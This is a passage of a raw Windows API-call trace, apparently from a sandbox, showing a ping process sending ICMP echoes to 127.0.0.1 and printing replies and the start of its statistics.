[0146.656] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x5dee00, nSize=0x0, Arguments=0x5dedfc | out: lpBuffer="笈~]⛔\x94䰨盪✣") returned 0x16 [0146.656] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.656] _fileno (_File=0x76ea4c28) returned 1 [0146.656] _get_osfhandle (_FileHandle=1) returned 0x28 [0146.656] GetFileType (hFile=0x28) returned 0x2 [0146.656] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc4 | out: lpMode=0x5dedc4) returned 0 [0146.657] GetLastError () returned 0x6 [0146.657] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded28, nSize=0x50 | out: lpBuffer="]✣") returned 0x0 [0146.657] _fileno (_File=0x76ea4c28) returned 1 [0146.657] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0146.657] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0146.657] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x7e7b40 [0146.657] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x7e7b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0146.657] _fileno (_File=0x76ea4c28) returned 1 [0146.657] _write (in: _FileHandle=1, _Buf=0x7e7b40*, _MaxCharCount=0x16 | out: _Buf=0x7e7b40*) returned 22 [0146.657] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.657] _fileno (_File=0x76ea4c28) returned 1 [0146.657] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0146.657] LocalFree (hMem=0x7e7b40) returned 0x0 [0146.657] LocalFree (hMem=0x7e7b08) returned 0x0 [0146.657] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x5dee00, nSize=0x0, Arguments=0x5dedfc | out: lpBuffer="笈~]⛿\x94䰨盪✼") returned 0x9 [0146.657] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.657] _fileno (_File=0x76ea4c28) returned 1 [0146.657] _get_osfhandle (_FileHandle=1) returned 0x28 [0146.657] GetFileType (hFile=0x28) returned 0x2 [0146.657] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc4 | out: lpMode=0x5dedc4) returned 0 [0146.657] GetLastError () returned 0x6 [0146.657] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded28, nSize=0x50 | out: lpBuffer="]✼") returned 0x0 [0146.657] _fileno (_File=0x76ea4c28) returned 1 [0146.657] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0146.657] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0146.657] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7d8910 [0146.657] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x7d8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0146.657] _fileno (_File=0x76ea4c28) returned 1 [0146.657] _write (in: _FileHandle=1, _Buf=0x7d8910*, _MaxCharCount=0x9 | out: _Buf=0x7d8910*) returned 9 [0146.657] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.657] _fileno (_File=0x76ea4c28) returned 1 [0146.657] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0146.657] LocalFree (hMem=0x7d8910) returned 0x0 [0146.657] LocalFree (hMem=0x7e7b08) returned 0x0 [0146.657] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x5dee04, nSize=0x0, Arguments=0x5dee00 | out: lpBuffer="笈~]➷\x94䰨盪✧") returned 0x9 [0146.657] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.657] _fileno (_File=0x76ea4c28) returned 1 [0146.657] _get_osfhandle (_FileHandle=1) returned 0x28 [0146.658] GetFileType (hFile=0x28) returned 0x2 [0146.658] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc8 | out: lpMode=0x5dedc8) returned 0 [0146.658] GetLastError () returned 0x6 [0146.658] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded2c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0146.658] _fileno (_File=0x76ea4c28) returned 1 [0146.658] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0146.658] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0146.658] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7d8910 [0146.658] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x7d8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0146.658] _fileno (_File=0x76ea4c28) returned 1 [0146.658] _write (in: _FileHandle=1, _Buf=0x7d8910*, _MaxCharCount=0x9 | out: _Buf=0x7d8910*) returned 9 [0146.658] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.658] _fileno (_File=0x76ea4c28) returned 1 [0146.658] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0146.658] LocalFree (hMem=0x7d8910) returned 0x0 [0146.658] LocalFree (hMem=0x7e7b08) returned 0x0 [0146.658] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x5dee00, nSize=0x0, Arguments=0x5dedfc | out: lpBuffer="笈~]⟘\x94䰨盪✨") returned 0x9 [0146.658] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.658] _fileno (_File=0x76ea4c28) returned 1 [0146.658] _get_osfhandle (_FileHandle=1) returned 0x28 [0146.658] GetFileType (hFile=0x28) returned 0x2 [0146.658] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc4 | out: lpMode=0x5dedc4) returned 0 [0146.658] GetLastError () returned 0x6 [0146.658] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded28, nSize=0x50 | out: lpBuffer="]✨") returned 0x0 [0146.658] _fileno (_File=0x76ea4c28) returned 1 [0146.658] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0146.658] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0146.658] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7d8910 [0146.658] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x7d8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0146.658] _fileno (_File=0x76ea4c28) returned 1 [0146.658] _write (in: _FileHandle=1, _Buf=0x7d8910*, _MaxCharCount=0x9 | out: _Buf=0x7d8910*) returned 9 [0146.658] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.658] _fileno (_File=0x76ea4c28) returned 1 [0146.658] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0146.658] LocalFree (hMem=0x7d8910) returned 0x0 [0146.658] LocalFree (hMem=0x7e7b08) returned 0x0 [0146.658] Sleep (dwMilliseconds=0x3e8) [0147.659] IcmpSendEcho2Ex (in: IcmpHandle=0x7d6a30, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x7dc3e0, RequestSize=0x20, RequestOptions=0x5dee7c, ReplyBuffer=0x7e5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x7e5270) returned 0x1 [0147.660] InetNtopW (in: Family=2, pAddr=0x5dee6c, pStringBuf=0x5def94, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0147.660] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x5dee00, nSize=0x0, Arguments=0x5dedfc | out: lpBuffer="羠~]⛔\x94䰨盪✣") returned 0x16 [0147.660] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0147.660] _fileno (_File=0x76ea4c28) returned 1 [0147.660] _get_osfhandle (_FileHandle=1) returned 0x28 [0147.660] GetFileType (hFile=0x28) returned 0x2 [0147.660] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc4 | out: lpMode=0x5dedc4) returned 0 [0147.660] GetLastError () returned 0x6 [0147.660] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded28, nSize=0x50 | out: lpBuffer="]✣") returned 0x0 [0147.660] _fileno (_File=0x76ea4c28) returned 1 [0147.660] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0147.661] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0147.661] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x7e7fd8 [0147.661] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x7e7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0147.661] _fileno (_File=0x76ea4c28) returned 1 [0147.661] _write (in: _FileHandle=1, _Buf=0x7e7fd8*, _MaxCharCount=0x16 | out: _Buf=0x7e7fd8*) returned 22 [0147.661] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0147.661] _fileno (_File=0x76ea4c28) returned 1 [0147.661] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0147.661] LocalFree (hMem=0x7e7fd8) returned 0x0 [0147.661] LocalFree (hMem=0x7e7fa0) returned 0x0 [0147.661] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x5dee00, nSize=0x0, Arguments=0x5dedfc | out: lpBuffer="羠~]⛿\x94䰨盪✼") returned 0x9 [0147.661] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0147.661] _fileno (_File=0x76ea4c28) returned 1 [0147.661] _get_osfhandle (_FileHandle=1) returned 0x28 [0147.661] GetFileType (hFile=0x28) returned 0x2 [0147.661] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc4 | out: lpMode=0x5dedc4) returned 0 [0147.661] GetLastError () returned 0x6 [0147.661] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded28, nSize=0x50 | out: lpBuffer="]✼") returned 0x0 [0147.661] _fileno (_File=0x76ea4c28) returned 1 [0147.661] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0147.661] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0147.661] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7d8910 [0147.661] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x7d8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0147.661] _fileno (_File=0x76ea4c28) returned 1 [0147.661] _write (in: _FileHandle=1, _Buf=0x7d8910*, _MaxCharCount=0x9 | out: _Buf=0x7d8910*) returned 9 [0147.661] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0147.661] _fileno (_File=0x76ea4c28) returned 1 [0147.661] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0147.661] LocalFree (hMem=0x7d8910) returned 0x0 [0147.661] LocalFree (hMem=0x7e7fa0) returned 0x0 [0147.661] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x5dee04, nSize=0x0, Arguments=0x5dee00 | out: lpBuffer="羠~]➷\x94䰨盪✧") returned 0x9 [0147.662] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0147.662] _fileno (_File=0x76ea4c28) returned 1 [0147.662] _get_osfhandle (_FileHandle=1) returned 0x28 [0147.662] GetFileType (hFile=0x28) returned 0x2 [0147.662] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc8 | out: lpMode=0x5dedc8) returned 0 [0147.662] GetLastError () returned 0x6 [0147.662] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded2c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0147.662] _fileno (_File=0x76ea4c28) returned 1 [0147.662] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0147.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0147.662] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7d8940 [0147.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x7d8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0147.662] _fileno (_File=0x76ea4c28) returned 1 [0147.662] _write (in: _FileHandle=1, _Buf=0x7d8940*, _MaxCharCount=0x9 | out: _Buf=0x7d8940*) returned 9 [0147.662] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0147.662] _fileno (_File=0x76ea4c28) returned 1 [0147.662] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0147.662] LocalFree (hMem=0x7d8940) returned 0x0 [0147.662] LocalFree (hMem=0x7e7fa0) returned 0x0 [0147.662] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x5dee00, nSize=0x0, Arguments=0x5dedfc | out: lpBuffer="羠~]⟘\x94䰨盪✨") returned 0x9 [0147.662] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0147.662] _fileno (_File=0x76ea4c28) returned 1 [0147.662] _get_osfhandle (_FileHandle=1) returned 0x28 [0147.662] GetFileType (hFile=0x28) returned 0x2 [0147.662] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc4 | out: lpMode=0x5dedc4) returned 0 [0147.662] GetLastError () returned 0x6 [0147.662] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded28, nSize=0x50 | out: lpBuffer="]✨") returned 0x0 [0147.662] _fileno (_File=0x76ea4c28) returned 1 [0147.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0147.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0147.662] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7d8910 [0147.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x7d8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0147.662] _fileno (_File=0x76ea4c28) returned 1 [0147.662] _write (in: _FileHandle=1, _Buf=0x7d8910*, _MaxCharCount=0x9 | out: _Buf=0x7d8910*) returned 9 [0147.662] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0147.662] _fileno (_File=0x76ea4c28) returned 1 [0147.662] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0147.662] LocalFree (hMem=0x7d8910) returned 0x0 [0147.662] LocalFree (hMem=0x7e7fa0) returned 0x0 [0147.663] Sleep (dwMilliseconds=0x3e8) [0148.675] IcmpSendEcho2Ex (in: IcmpHandle=0x7d6a30, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x7dc3e0, RequestSize=0x20, RequestOptions=0x5dee7c, ReplyBuffer=0x7e5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x7e5270) returned 0x1 [0148.720] InetNtopW (in: Family=2, pAddr=0x5dee6c, pStringBuf=0x5def94, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0148.720] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x5dee00, nSize=0x0, Arguments=0x5dedfc | out: lpBuffer="羠~]⛔\x94䰨盪✣") returned 0x16 [0148.720] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.720] _fileno (_File=0x76ea4c28) returned 1 [0148.720] _get_osfhandle (_FileHandle=1) returned 0x28 [0148.720] GetFileType (hFile=0x28) returned 0x2 [0148.720] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc4 | out: lpMode=0x5dedc4) returned 0 [0148.720] GetLastError () returned 0x6 [0148.720] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded28, nSize=0x50 | out: lpBuffer="]✣") returned 0x0 [0148.720] _fileno (_File=0x76ea4c28) returned 1 [0148.720] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0148.720] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.720] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x7e7fd8 [0148.720] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x7e7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0148.720] _fileno (_File=0x76ea4c28) returned 1 [0148.720] _write (in: _FileHandle=1, _Buf=0x7e7fd8*, _MaxCharCount=0x16 | out: _Buf=0x7e7fd8*) returned 22 [0148.720] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.720] _fileno (_File=0x76ea4c28) returned 1 [0148.720] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0148.720] LocalFree (hMem=0x7e7fd8) returned 0x0 [0148.720] LocalFree (hMem=0x7e7fa0) returned 0x0 [0148.720] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x5dee00, nSize=0x0, Arguments=0x5dedfc | out: lpBuffer="羠~]⛿\x94䰨盪✼") returned 0x9 [0148.720] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.720] _fileno (_File=0x76ea4c28) returned 1 [0148.720] _get_osfhandle (_FileHandle=1) returned 0x28 [0148.720] GetFileType (hFile=0x28) returned 0x2 [0148.720] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc4 | out: lpMode=0x5dedc4) returned 0 [0148.720] GetLastError () returned 0x6 [0148.720] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded28, nSize=0x50 | out: lpBuffer="]✼") returned 0x0 [0148.720] _fileno (_File=0x76ea4c28) returned 1 [0148.720] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0148.720] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0148.720] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7d8910 [0148.721] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x7d8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0148.721] _fileno (_File=0x76ea4c28) returned 1 [0148.721] _write (in: _FileHandle=1, _Buf=0x7d8910*, _MaxCharCount=0x9 | out: _Buf=0x7d8910*) returned 9 [0148.721] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.721] _fileno (_File=0x76ea4c28) returned 1 [0148.721] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0148.721] LocalFree (hMem=0x7d8910) returned 0x0 [0148.721] LocalFree (hMem=0x7e7fa0) returned 0x0 [0148.721] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x5dee04, nSize=0x0, Arguments=0x5dee00 | out: lpBuffer="羠~]➷\x94䰨盪✧") returned 0x9 [0148.721] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.721] _fileno (_File=0x76ea4c28) returned 1 [0148.721] _get_osfhandle (_FileHandle=1) returned 0x28 [0148.721] GetFileType (hFile=0x28) returned 0x2 [0148.721] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc8 | out: lpMode=0x5dedc8) returned 0 [0148.721] GetLastError () returned 0x6 [0148.721] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded2c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0148.721] _fileno (_File=0x76ea4c28) returned 1 [0148.721] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0148.721] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0148.721] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7d8910 [0148.721] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x7d8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0148.721] _fileno (_File=0x76ea4c28) returned 1 [0148.721] _write (in: _FileHandle=1, _Buf=0x7d8910*, _MaxCharCount=0x9 | out: _Buf=0x7d8910*) returned 9 [0148.721] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.721] _fileno (_File=0x76ea4c28) returned 1 [0148.721] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0148.721] LocalFree (hMem=0x7d8910) returned 0x0 [0148.721] LocalFree (hMem=0x7e7fa0) returned 0x0 [0148.721] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x5dee00, nSize=0x0, Arguments=0x5dedfc | out: lpBuffer="羠~]⟘\x94䰨盪✨") returned 0x9 [0148.721] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.721] _fileno (_File=0x76ea4c28) returned 1 [0148.721] _get_osfhandle (_FileHandle=1) returned 0x28 [0148.721] GetFileType (hFile=0x28) returned 0x2 [0148.721] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc4 | out: lpMode=0x5dedc4) returned 0 [0148.721] GetLastError () returned 0x6 [0148.721] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded28, nSize=0x50 | out: lpBuffer="]✨") returned 0x0 [0148.721] _fileno (_File=0x76ea4c28) returned 1 [0148.722] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0148.722] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0148.722] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7d8970 [0148.722] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x7d8970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0148.722] _fileno (_File=0x76ea4c28) returned 1 [0148.722] _write (in: _FileHandle=1, _Buf=0x7d8970*, _MaxCharCount=0x9 | out: _Buf=0x7d8970*) returned 9 [0148.722] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.722] _fileno (_File=0x76ea4c28) returned 1 [0148.722] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0148.722] LocalFree (hMem=0x7d8970) returned 0x0 [0148.722] LocalFree (hMem=0x7e7fa0) returned 0x0 [0148.722] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x5ded88, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0148.722] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x5ded5c, nSize=0x0, Arguments=0x5ded58 | out: lpBuffer="羠~]᧰\x94䰨盪❏") returned 0x5c [0148.722] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.722] _fileno (_File=0x76ea4c28) returned 1 [0148.722] _get_osfhandle (_FileHandle=1) returned 0x28 [0148.722] GetFileType (hFile=0x28) returned 0x2 [0148.722] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ded20 | out: lpMode=0x5ded20) returned 0 [0148.722] GetLastError () returned 0x6 [0148.722] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5dec84, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0148.722] _fileno (_File=0x76ea4c28) returned 1 [0148.722] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0148.722] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0148.722] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x7e8068 [0148.722] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x7e8068, cbMultiByte=93, lpDefaultChar=0x0, 